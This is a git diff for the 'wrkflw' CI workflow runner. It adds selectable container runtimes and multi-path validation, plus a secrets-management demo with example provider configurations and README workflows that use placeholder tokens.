pub use wrkflw_ui as ui;
|
||||
pub use wrkflw_utils as utils;
|
||||
pub use wrkflw_validators as validators;
|
||||
|
||||
@@ -1,15 +1,38 @@
|
||||
use bollard::Docker;
|
||||
use clap::{Parser, Subcommand};
|
||||
use clap::{Parser, Subcommand, ValueEnum};
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[derive(Debug, Clone, ValueEnum)]
|
||||
enum RuntimeChoice {
|
||||
/// Use Docker containers for isolation
|
||||
Docker,
|
||||
/// Use Podman containers for isolation
|
||||
Podman,
|
||||
/// Use process emulation mode (no containers, UNSAFE)
|
||||
Emulation,
|
||||
/// Use secure emulation mode with sandboxing (recommended for untrusted code)
|
||||
SecureEmulation,
|
||||
}
|
||||
|
||||
impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
|
||||
fn from(choice: RuntimeChoice) -> Self {
|
||||
match choice {
|
||||
RuntimeChoice::Docker => wrkflw_executor::RuntimeType::Docker,
|
||||
RuntimeChoice::Podman => wrkflw_executor::RuntimeType::Podman,
|
||||
RuntimeChoice::Emulation => wrkflw_executor::RuntimeType::Emulation,
|
||||
RuntimeChoice::SecureEmulation => wrkflw_executor::RuntimeType::SecureEmulation,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, Parser)]
|
||||
#[command(
|
||||
name = "wrkflw",
|
||||
about = "GitHub & GitLab CI/CD validator and executor",
|
||||
version,
|
||||
long_about = "A CI/CD validator and executor that runs workflows locally.\n\nExamples:\n wrkflw validate # Validate all workflows in .github/workflows\n wrkflw run .github/workflows/build.yml # Run a specific workflow\n wrkflw run .gitlab-ci.yml # Run a GitLab CI pipeline\n wrkflw --verbose run .github/workflows/build.yml # Run with more output\n wrkflw --debug run .github/workflows/build.yml # Run with detailed debug information\n wrkflw run --emulate .github/workflows/build.yml # Use emulation mode instead of Docker\n wrkflw run --preserve-containers-on-failure .github/workflows/build.yml # Keep failed containers for debugging"
|
||||
long_about = "A CI/CD validator and executor that runs workflows locally.\n\nExamples:\n wrkflw validate # Validate all workflows in .github/workflows\n wrkflw run .github/workflows/build.yml # Run a specific workflow\n wrkflw run .gitlab-ci.yml # Run a GitLab CI pipeline\n wrkflw --verbose run .github/workflows/build.yml # Run with more output\n wrkflw --debug run .github/workflows/build.yml # Run with detailed debug information\n wrkflw run --runtime emulation .github/workflows/build.yml # Use emulation mode instead of containers\n wrkflw run --runtime podman .github/workflows/build.yml # Use Podman instead of Docker\n wrkflw run --preserve-containers-on-failure .github/workflows/build.yml # Keep failed containers for debugging"
|
||||
)]
|
||||
struct Wrkflw {
|
||||
#[command(subcommand)]
|
||||
@@ -28,8 +51,9 @@ struct Wrkflw {
|
||||
enum Commands {
|
||||
/// Validate workflow or pipeline files
|
||||
Validate {
|
||||
/// Path to workflow/pipeline file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
/// Path(s) to workflow/pipeline file(s) or directory(ies) (defaults to .github/workflows if none provided)
|
||||
#[arg(value_name = "path", num_args = 0..)]
|
||||
paths: Vec<PathBuf>,
|
||||
|
||||
/// Explicitly validate as GitLab CI/CD pipeline
|
||||
#[arg(long)]
|
||||
@@ -49,9 +73,9 @@ enum Commands {
|
||||
/// Path to workflow/pipeline file to execute
|
||||
path: PathBuf,
|
||||
|
||||
/// Use emulation mode instead of Docker
|
||||
#[arg(short, long)]
|
||||
emulate: bool,
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
/// Show 'Would execute GitHub action' messages in emulation mode
|
||||
#[arg(long, default_value_t = false)]
|
||||
@@ -71,9 +95,9 @@ enum Commands {
|
||||
/// Path to workflow file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
|
||||
/// Use emulation mode instead of Docker
|
||||
#[arg(short, long)]
|
||||
emulate: bool,
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
/// Show 'Would execute GitHub action' messages in emulation mode
|
||||
#[arg(long, default_value_t = false)]
|
||||
@@ -123,7 +147,7 @@ fn parse_key_val(s: &str) -> Result<(String, String), String> {
|
||||
}
|
||||
|
||||
// Make this function public for testing? Or move to a utils/cleanup mod?
|
||||
// Or call executor::cleanup and runtime::cleanup directly?
|
||||
// Or call wrkflw_executor::cleanup and wrkflw_runtime::cleanup directly?
|
||||
// Let's try calling them directly for now.
|
||||
async fn cleanup_on_exit() {
|
||||
// Clean up Docker resources if available, but don't let it block indefinitely
|
||||
@@ -131,35 +155,35 @@ async fn cleanup_on_exit() {
|
||||
match Docker::connect_with_local_defaults() {
|
||||
Ok(docker) => {
|
||||
// Assuming cleanup_resources exists in executor crate
|
||||
executor::cleanup_resources(&docker).await;
|
||||
wrkflw_executor::cleanup_resources(&docker).await;
|
||||
}
|
||||
Err(_) => {
|
||||
// Docker not available
|
||||
logging::info("Docker not available, skipping Docker cleanup");
|
||||
wrkflw_logging::info("Docker not available, skipping Docker cleanup");
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Docker cleanup completed successfully"),
|
||||
Err(_) => {
|
||||
logging::warning("Docker cleanup timed out after 3 seconds, continuing with shutdown")
|
||||
}
|
||||
Ok(_) => wrkflw_logging::debug("Docker cleanup completed successfully"),
|
||||
Err(_) => wrkflw_logging::warning(
|
||||
"Docker cleanup timed out after 3 seconds, continuing with shutdown",
|
||||
),
|
||||
}
|
||||
|
||||
// Always clean up emulation resources
|
||||
match tokio::time::timeout(
|
||||
std::time::Duration::from_secs(2),
|
||||
// Assuming cleanup_resources exists in runtime::emulation module
|
||||
runtime::emulation::cleanup_resources(),
|
||||
// Assuming cleanup_resources exists in wrkflw_runtime::emulation module
|
||||
wrkflw_runtime::emulation::cleanup_resources(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Emulation cleanup completed successfully"),
|
||||
Err(_) => logging::warning("Emulation cleanup timed out, continuing with shutdown"),
|
||||
Ok(_) => wrkflw_logging::debug("Emulation cleanup completed successfully"),
|
||||
Err(_) => wrkflw_logging::warning("Emulation cleanup timed out, continuing with shutdown"),
|
||||
}
|
||||
|
||||
logging::info("Resource cleanup completed");
|
||||
wrkflw_logging::info("Resource cleanup completed");
|
||||
}
|
||||
|
||||
async fn handle_signals() {
|
||||
@@ -187,7 +211,7 @@ async fn handle_signals() {
|
||||
"Cleanup taking too long (over {} seconds), forcing exit...",
|
||||
hard_exit_time.as_secs()
|
||||
);
|
||||
logging::error("Forced exit due to cleanup timeout");
|
||||
wrkflw_logging::error("Forced exit due to cleanup timeout");
|
||||
std::process::exit(1);
|
||||
});
|
||||
|
||||
@@ -246,19 +270,41 @@ fn is_gitlab_pipeline(path: &Path) -> bool {
|
||||
|
||||
#[tokio::main]
|
||||
async fn main() {
|
||||
// Gracefully handle Broken pipe (EPIPE) when output is piped (e.g., to `head`)
|
||||
let default_panic_hook = std::panic::take_hook();
|
||||
std::panic::set_hook(Box::new(move |info| {
|
||||
let mut is_broken_pipe = false;
|
||||
if let Some(s) = info.payload().downcast_ref::<&str>() {
|
||||
if s.contains("Broken pipe") {
|
||||
is_broken_pipe = true;
|
||||
}
|
||||
}
|
||||
if let Some(s) = info.payload().downcast_ref::<String>() {
|
||||
if s.contains("Broken pipe") {
|
||||
is_broken_pipe = true;
|
||||
}
|
||||
}
|
||||
if is_broken_pipe {
|
||||
// Treat as a successful, short-circuited exit
|
||||
std::process::exit(0);
|
||||
}
|
||||
// Fallback to the default hook for all other panics
|
||||
default_panic_hook(info);
|
||||
}));
|
||||
|
||||
let cli = Wrkflw::parse();
|
||||
let verbose = cli.verbose;
|
||||
let debug = cli.debug;
|
||||
|
||||
// Set log level based on command line flags
|
||||
if debug {
|
||||
logging::set_log_level(logging::LogLevel::Debug);
|
||||
logging::debug("Debug mode enabled - showing detailed logs");
|
||||
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Debug);
|
||||
wrkflw_logging::debug("Debug mode enabled - showing detailed logs");
|
||||
} else if verbose {
|
||||
logging::set_log_level(logging::LogLevel::Info);
|
||||
logging::info("Verbose mode enabled");
|
||||
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Info);
|
||||
wrkflw_logging::info("Verbose mode enabled");
|
||||
} else {
|
||||
logging::set_log_level(logging::LogLevel::Warning);
|
||||
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Warning);
|
||||
}
|
||||
|
||||
// Setup a Ctrl+C handler that runs in the background
|
||||
@@ -266,65 +312,78 @@ async fn main() {
|
||||
|
||||
match &cli.command {
|
||||
Some(Commands::Validate {
|
||||
path,
|
||||
paths,
|
||||
gitlab,
|
||||
exit_code,
|
||||
no_exit_code,
|
||||
}) => {
|
||||
// Determine the path to validate
|
||||
let validate_path = path
|
||||
.clone()
|
||||
.unwrap_or_else(|| PathBuf::from(".github/workflows"));
|
||||
|
||||
// Check if the path exists
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
std::process::exit(1);
|
||||
}
|
||||
// Determine the paths to validate (default to .github/workflows when none provided)
|
||||
let validate_paths: Vec<PathBuf> = if paths.is_empty() {
|
||||
vec![PathBuf::from(".github/workflows")]
|
||||
} else {
|
||||
paths.clone()
|
||||
};
|
||||
|
||||
// Determine if we're validating a GitLab pipeline based on the --gitlab flag or file detection
|
||||
let force_gitlab = *gitlab;
|
||||
let mut validation_failed = false;
|
||||
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
for validate_path in validate_paths {
|
||||
// Check if the path exists; if not, mark failure but continue
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
validation_failed = true;
|
||||
continue;
|
||||
}
|
||||
|
||||
println!("Validating {} workflow file(s)...", entries.len());
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
println!(
|
||||
"Validating {} workflow file(s) in {}...",
|
||||
entries.len(),
|
||||
validate_path.display()
|
||||
);
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
validation_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
}
|
||||
|
||||
// Set exit code if validation failed and exit_code flag is true (and no_exit_code is false)
|
||||
@@ -334,20 +393,17 @@ async fn main() {
|
||||
}
|
||||
Some(Commands::Run {
|
||||
path,
|
||||
emulate,
|
||||
runtime,
|
||||
show_action_messages: _,
|
||||
preserve_containers_on_failure,
|
||||
gitlab,
|
||||
}) => {
|
||||
// Create execution configuration
|
||||
let config = executor::ExecutionConfig {
|
||||
runtime_type: if *emulate {
|
||||
executor::RuntimeType::Emulation
|
||||
} else {
|
||||
executor::RuntimeType::Docker
|
||||
},
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type: runtime.clone().into(),
|
||||
verbose,
|
||||
preserve_containers_on_failure: *preserve_containers_on_failure,
|
||||
secrets_config: None, // Use default secrets configuration
|
||||
};
|
||||
|
||||
// Check if we're explicitly or implicitly running a GitLab pipeline
|
||||
@@ -358,10 +414,10 @@ async fn main() {
|
||||
"GitHub workflow"
|
||||
};
|
||||
|
||||
logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
|
||||
wrkflw_logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
|
||||
|
||||
// Execute the workflow
|
||||
let result = executor::execute_workflow(path, config)
|
||||
let result = wrkflw_executor::execute_workflow(path, config)
|
||||
.await
|
||||
.unwrap_or_else(|e| {
|
||||
eprintln!("Error executing workflow: {}", e);
|
||||
@@ -403,15 +459,15 @@ async fn main() {
|
||||
println!(
|
||||
" {} {} ({})",
|
||||
match job.status {
|
||||
executor::JobStatus::Success => "✅",
|
||||
executor::JobStatus::Failure => "❌",
|
||||
executor::JobStatus::Skipped => "⏭️",
|
||||
wrkflw_executor::JobStatus::Success => "✅",
|
||||
wrkflw_executor::JobStatus::Failure => "❌",
|
||||
wrkflw_executor::JobStatus::Skipped => "⏭️",
|
||||
},
|
||||
job.name,
|
||||
match job.status {
|
||||
executor::JobStatus::Success => "success",
|
||||
executor::JobStatus::Failure => "failure",
|
||||
executor::JobStatus::Skipped => "skipped",
|
||||
wrkflw_executor::JobStatus::Success => "success",
|
||||
wrkflw_executor::JobStatus::Failure => "failure",
|
||||
wrkflw_executor::JobStatus::Skipped => "skipped",
|
||||
}
|
||||
);
|
||||
|
||||
@@ -419,15 +475,15 @@ async fn main() {
|
||||
println!(" Steps:");
|
||||
for step in job.steps {
|
||||
let step_status = match step.status {
|
||||
executor::StepStatus::Success => "✅",
|
||||
executor::StepStatus::Failure => "❌",
|
||||
executor::StepStatus::Skipped => "⏭️",
|
||||
wrkflw_executor::StepStatus::Success => "✅",
|
||||
wrkflw_executor::StepStatus::Failure => "❌",
|
||||
wrkflw_executor::StepStatus::Skipped => "⏭️",
|
||||
};
|
||||
|
||||
println!(" {} {}", step_status, step.name);
|
||||
|
||||
// If step failed and we're not in verbose mode, show condensed error info
|
||||
if step.status == executor::StepStatus::Failure && !verbose {
|
||||
if step.status == wrkflw_executor::StepStatus::Failure && !verbose {
|
||||
// Extract error information from step output
|
||||
let error_lines = step
|
||||
.output
|
||||
@@ -466,26 +522,22 @@ async fn main() {
|
||||
.map(|v| v.iter().cloned().collect::<HashMap<String, String>>());
|
||||
|
||||
// Trigger the pipeline
|
||||
if let Err(e) = gitlab::trigger_pipeline(branch.as_deref(), variables).await {
|
||||
if let Err(e) = wrkflw_gitlab::trigger_pipeline(branch.as_deref(), variables).await {
|
||||
eprintln!("Error triggering GitLab pipeline: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
Some(Commands::Tui {
|
||||
path,
|
||||
emulate,
|
||||
runtime,
|
||||
show_action_messages: _,
|
||||
preserve_containers_on_failure,
|
||||
}) => {
|
||||
// Set runtime type based on the emulate flag
|
||||
let runtime_type = if *emulate {
|
||||
executor::RuntimeType::Emulation
|
||||
} else {
|
||||
executor::RuntimeType::Docker
|
||||
};
|
||||
// Set runtime type based on the runtime choice
|
||||
let runtime_type = runtime.clone().into();
|
||||
|
||||
// Call the TUI implementation from the ui crate
|
||||
if let Err(e) = ui::run_wrkflw_tui(
|
||||
if let Err(e) = wrkflw_ui::run_wrkflw_tui(
|
||||
path.as_ref(),
|
||||
runtime_type,
|
||||
verbose,
|
||||
@@ -508,7 +560,9 @@ async fn main() {
|
||||
.map(|i| i.iter().cloned().collect::<HashMap<String, String>>());
|
||||
|
||||
// Trigger the workflow
|
||||
if let Err(e) = github::trigger_workflow(workflow, branch.as_deref(), inputs).await {
|
||||
if let Err(e) =
|
||||
wrkflw_github::trigger_workflow(workflow, branch.as_deref(), inputs).await
|
||||
{
|
||||
eprintln!("Error triggering GitHub workflow: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
@@ -518,10 +572,10 @@ async fn main() {
|
||||
}
|
||||
None => {
|
||||
// Launch TUI by default when no command is provided
|
||||
let runtime_type = executor::RuntimeType::Docker;
|
||||
let runtime_type = wrkflw_executor::RuntimeType::Docker;
|
||||
|
||||
// Call the TUI implementation from the ui crate with default path
|
||||
if let Err(e) = ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
|
||||
if let Err(e) = wrkflw_ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
|
||||
eprintln!("Error running TUI: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
@@ -535,13 +589,13 @@ fn validate_github_workflow(path: &Path, verbose: bool) -> bool {
|
||||
print!("Validating GitHub workflow file: {}... ", path.display());
|
||||
|
||||
// Use the ui crate's validate_workflow function
|
||||
match ui::validate_workflow(path, verbose) {
|
||||
match wrkflw_ui::validate_workflow(path, verbose) {
|
||||
Ok(_) => {
|
||||
// The detailed validation output is already printed by the function
|
||||
// We need to check if there were validation issues
|
||||
// Since ui::validate_workflow doesn't return the validation result directly,
|
||||
// Since wrkflw_ui::validate_workflow doesn't return the validation result directly,
|
||||
// we need to call the evaluator directly to get the result
|
||||
match evaluator::evaluate_workflow_file(path, verbose) {
|
||||
match wrkflw_evaluator::evaluate_workflow_file(path, verbose) {
|
||||
Ok(result) => !result.is_valid,
|
||||
Err(_) => true, // Parse errors count as validation failure
|
||||
}
|
||||
@@ -559,12 +613,12 @@ fn validate_gitlab_pipeline(path: &Path, verbose: bool) -> bool {
|
||||
print!("Validating GitLab CI pipeline file: {}... ", path.display());
|
||||
|
||||
// Parse and validate the pipeline file
|
||||
match parser::gitlab::parse_pipeline(path) {
|
||||
match wrkflw_parser::gitlab::parse_pipeline(path) {
|
||||
Ok(pipeline) => {
|
||||
println!("✅ Valid syntax");
|
||||
|
||||
// Additional structural validation
|
||||
let validation_result = validators::validate_gitlab_pipeline(&pipeline);
|
||||
let validation_result = wrkflw_validators::validate_gitlab_pipeline(&pipeline);
|
||||
|
||||
if !validation_result.is_valid {
|
||||
println!("⚠️ Validation issues:");
|
||||
|
||||
65
examples/secrets-demo/.wrkflw/secrets.yml
Normal file
65
examples/secrets-demo/.wrkflw/secrets.yml
Normal file
@@ -0,0 +1,65 @@
|
||||
# wrkflw Secrets Configuration
|
||||
# This file demonstrates various secret provider configurations
|
||||
|
||||
# Default provider to use when no provider is specified in ${{ secrets.name }}
|
||||
default_provider: env
|
||||
|
||||
# Enable automatic masking of secrets in logs and output
|
||||
enable_masking: true
|
||||
|
||||
# Timeout for secret operations (seconds)
|
||||
timeout_seconds: 30
|
||||
|
||||
# Enable caching for performance
|
||||
enable_caching: true
|
||||
|
||||
# Cache TTL in seconds
|
||||
cache_ttl_seconds: 300
|
||||
|
||||
# Secret provider configurations
|
||||
providers:
|
||||
# Environment variable provider
|
||||
env:
|
||||
type: environment
|
||||
# Optional prefix for environment variables
|
||||
# If specified, looks for WRKFLW_SECRET_* variables
|
||||
# prefix: "WRKFLW_SECRET_"
|
||||
|
||||
# File-based secret storage
|
||||
file:
|
||||
type: file
|
||||
# Path to secrets file (supports JSON, YAML, or environment format)
|
||||
path: "~/.wrkflw/secrets.json"
|
||||
|
||||
# HashiCorp Vault (requires vault-provider feature)
|
||||
vault:
|
||||
type: vault
|
||||
url: "https://vault.example.com"
|
||||
auth:
|
||||
method: token
|
||||
token: "${VAULT_TOKEN}"
|
||||
mount_path: "secret"
|
||||
|
||||
# AWS Secrets Manager (requires aws-provider feature)
|
||||
aws:
|
||||
type: aws_secrets_manager
|
||||
region: "us-east-1"
|
||||
# Optional role to assume for cross-account access
|
||||
role_arn: "arn:aws:iam::123456789012:role/SecretRole"
|
||||
|
||||
# Azure Key Vault (requires azure-provider feature)
|
||||
azure:
|
||||
type: azure_key_vault
|
||||
vault_url: "https://myvault.vault.azure.net/"
|
||||
auth:
|
||||
method: service_principal
|
||||
client_id: "${AZURE_CLIENT_ID}"
|
||||
client_secret: "${AZURE_CLIENT_SECRET}"
|
||||
tenant_id: "${AZURE_TENANT_ID}"
|
||||
|
||||
# Google Cloud Secret Manager (requires gcp-provider feature)
|
||||
gcp:
|
||||
type: gcp_secret_manager
|
||||
project_id: "my-project-id"
|
||||
# Optional service account key file
|
||||
key_file: "/path/to/service-account.json"
|
||||
505
examples/secrets-demo/README.md
Normal file
505
examples/secrets-demo/README.md
Normal file
@@ -0,0 +1,505 @@
|
||||
# wrkflw Secrets Management Demo
|
||||
|
||||
This demo demonstrates the comprehensive secrets management system in wrkflw, addressing the critical need for secure secret handling in CI/CD workflows.
|
||||
|
||||
## The Problem
|
||||
|
||||
Without proper secrets support, workflows are severely limited because:
|
||||
|
||||
1. **No way to access sensitive data** - API keys, tokens, passwords, certificates
|
||||
2. **Security risks** - Hardcoded secrets in code or plain text in logs
|
||||
3. **Limited usefulness** - Can't integrate with real services that require authentication
|
||||
4. **Compliance issues** - Unable to meet security standards for production workflows
|
||||
|
||||
## The Solution
|
||||
|
||||
wrkflw now provides comprehensive secrets management with:
|
||||
|
||||
- **Multiple secret providers** (environment variables, files, HashiCorp Vault, AWS Secrets Manager, etc.)
|
||||
- **GitHub Actions-compatible syntax** (`${{ secrets.* }}`)
|
||||
- **Automatic secret masking** in logs and output
|
||||
- **Encrypted storage** for sensitive environments
|
||||
- **Flexible configuration** for different deployment scenarios
|
||||
|
||||
## Quick Start
|
||||
|
||||
### 1. Environment Variables (Simplest)
|
||||
|
||||
```bash
|
||||
# Set secrets as environment variables
|
||||
export GITHUB_TOKEN="ghp_your_token_here"
|
||||
export API_KEY="your_api_key"
|
||||
export DB_PASSWORD="secure_password"
|
||||
```
|
||||
|
||||
Create a workflow that uses secrets:
|
||||
|
||||
```yaml
|
||||
# .github/workflows/secrets-demo.yml
|
||||
name: Secrets Demo
|
||||
on: [push]
|
||||
|
||||
jobs:
|
||||
test-secrets:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Use GitHub Token
|
||||
run: |
|
||||
echo "Using token to access GitHub API"
|
||||
curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
|
||||
https://api.github.com/user
|
||||
|
||||
- name: Use API Key
|
||||
run: |
|
||||
echo "API Key: ${{ secrets.API_KEY }}"
|
||||
|
||||
- name: Database Connection
|
||||
env:
|
||||
DB_PASS: ${{ secrets.DB_PASSWORD }}
|
||||
run: |
|
||||
echo "Connecting to database with password: ${DB_PASS}"
|
||||
```
|
||||
|
||||
Run with wrkflw:
|
||||
|
||||
```bash
|
||||
wrkflw run .github/workflows/secrets-demo.yml
|
||||
```
|
||||
|
||||
### 2. File-based Secrets
|
||||
|
||||
Create a secrets file:
|
||||
|
||||
```json
|
||||
{
|
||||
"API_KEY": "your_api_key_here",
|
||||
"DB_PASSWORD": "secure_database_password",
|
||||
"GITHUB_TOKEN": "ghp_your_github_token"
|
||||
}
|
||||
```
|
||||
|
||||
Or environment file format:
|
||||
|
||||
```bash
|
||||
# secrets.env
|
||||
API_KEY=your_api_key_here
|
||||
DB_PASSWORD="secure database password"
|
||||
GITHUB_TOKEN=ghp_your_github_token
|
||||
```
|
||||
|
||||
Configure wrkflw to use file-based secrets:
|
||||
|
||||
```yaml
|
||||
# ~/.wrkflw/secrets.yml
|
||||
default_provider: file
|
||||
enable_masking: true
|
||||
timeout_seconds: 30
|
||||
|
||||
providers:
|
||||
file:
|
||||
type: file
|
||||
path: "./secrets.json" # or "./secrets.env"
|
||||
```
|
||||
|
||||
### 3. Advanced Configuration
|
||||
|
||||
For production environments, use external secret managers:
|
||||
|
||||
```yaml
|
||||
# ~/.wrkflw/secrets.yml
|
||||
default_provider: vault
|
||||
enable_masking: true
|
||||
timeout_seconds: 30
|
||||
enable_caching: true
|
||||
cache_ttl_seconds: 300
|
||||
|
||||
providers:
|
||||
env:
|
||||
type: environment
|
||||
prefix: "WRKFLW_SECRET_"
|
||||
|
||||
vault:
|
||||
type: vault
|
||||
url: "https://vault.company.com"
|
||||
auth:
|
||||
method: token
|
||||
token: "${VAULT_TOKEN}"
|
||||
mount_path: "secret"
|
||||
|
||||
aws:
|
||||
type: aws_secrets_manager
|
||||
region: "us-east-1"
|
||||
role_arn: "arn:aws:iam::123456789012:role/SecretRole"
|
||||
```
|
||||
|
||||
## Secret Providers
|
||||
|
||||
### Environment Variables
|
||||
|
||||
**Best for**: Development and simple deployments
|
||||
|
||||
```bash
|
||||
# With prefix
|
||||
export WRKFLW_SECRET_API_KEY="your_key"
|
||||
export WRKFLW_SECRET_DB_PASSWORD="password"
|
||||
|
||||
# Direct environment variables
|
||||
export GITHUB_TOKEN="ghp_token"
|
||||
export API_KEY="key_value"
|
||||
```
|
||||
|
||||
Use in workflows:
|
||||
```yaml
|
||||
steps:
|
||||
- name: Use prefixed secret
|
||||
run: echo "API: ${{ secrets.env:API_KEY }}"
|
||||
|
||||
- name: Use direct secret
|
||||
run: echo "Token: ${{ secrets.GITHUB_TOKEN }}"
|
||||
```
|
||||
|
||||
### File-based Storage
|
||||
|
||||
**Best for**: Local development and testing
|
||||
|
||||
Supports multiple formats:
|
||||
|
||||
**JSON** (`secrets.json`):
|
||||
```json
|
||||
{
|
||||
"GITHUB_TOKEN": "ghp_your_token",
|
||||
"API_KEY": "your_api_key",
|
||||
"DATABASE_URL": "postgresql://user:pass@localhost/db"
|
||||
}
|
||||
```
|
||||
|
||||
**YAML** (`secrets.yml`):
|
||||
```yaml
|
||||
GITHUB_TOKEN: ghp_your_token
|
||||
API_KEY: your_api_key
|
||||
DATABASE_URL: postgresql://user:pass@localhost/db
|
||||
```
|
||||
|
||||
**Environment** (`secrets.env`):
|
||||
```bash
|
||||
GITHUB_TOKEN=ghp_your_token
|
||||
API_KEY=your_api_key
|
||||
DATABASE_URL="postgresql://user:pass@localhost/db"
|
||||
```
|
||||
|
||||
### HashiCorp Vault
|
||||
|
||||
**Best for**: Production environments with centralized secret management
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
vault:
|
||||
type: vault
|
||||
url: "https://vault.company.com"
|
||||
auth:
|
||||
method: token
|
||||
token: "${VAULT_TOKEN}"
|
||||
mount_path: "secret/v2"
|
||||
```
|
||||
|
||||
Use vault secrets in workflows:
|
||||
```yaml
|
||||
steps:
|
||||
- name: Use Vault secret
|
||||
run: curl -H "X-API-Key: ${{ secrets.vault:api-key }}" api.service.com
|
||||
```
|
||||
|
||||
### AWS Secrets Manager
|
||||
|
||||
**Best for**: AWS-native deployments
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
aws:
|
||||
type: aws_secrets_manager
|
||||
region: "us-east-1"
|
||||
role_arn: "arn:aws:iam::123456789012:role/SecretRole"
|
||||
```
|
||||
|
||||
### Azure Key Vault
|
||||
|
||||
**Best for**: Azure-native deployments
|
||||
|
||||
```yaml
|
||||
providers:
|
||||
azure:
|
||||
type: azure_key_vault
|
||||
vault_url: "https://myvault.vault.azure.net/"
|
||||
auth:
|
||||
method: service_principal
|
||||
client_id: "${AZURE_CLIENT_ID}"
|
||||
client_secret: "${AZURE_CLIENT_SECRET}"
|
||||
tenant_id: "${AZURE_TENANT_ID}"
|
||||
```
|
||||
|
||||
## Secret Masking
|
||||
|
||||
wrkflw automatically masks secrets in logs to prevent accidental exposure:
|
||||
|
||||
```bash
|
||||
# Original log:
|
||||
# "API response: {\"token\": \"ghp_1234567890abcdef\", \"status\": \"ok\"}"
|
||||
|
||||
# Masked log:
|
||||
# "API response: {\"token\": \"ghp_***\", \"status\": \"ok\"}"
|
||||
```
|
||||
|
||||
Automatically detects and masks:
|
||||
- GitHub Personal Access Tokens (`ghp_*`)
|
||||
- GitHub App tokens (`ghs_*`)
|
||||
- GitHub OAuth tokens (`gho_*`)
|
||||
- AWS Access Keys (`AKIA*`)
|
||||
- JWT tokens
|
||||
- Generic API keys
|
||||
|
||||
## Workflow Examples
|
||||
|
||||
### GitHub API Integration
|
||||
|
||||
```yaml
|
||||
name: GitHub API Demo
|
||||
on: [push]
|
||||
|
||||
jobs:
|
||||
github-integration:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: List repositories
|
||||
run: |
|
||||
curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
|
||||
-H "Accept: application/vnd.github.v3+json" \
|
||||
https://api.github.com/user/repos
|
||||
|
||||
- name: Create issue
|
||||
run: |
|
||||
curl -X POST \
|
||||
-H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
|
||||
-H "Accept: application/vnd.github.v3+json" \
|
||||
https://api.github.com/repos/owner/repo/issues \
|
||||
-d '{"title":"Automated issue","body":"Created by wrkflw"}'
|
||||
```
|
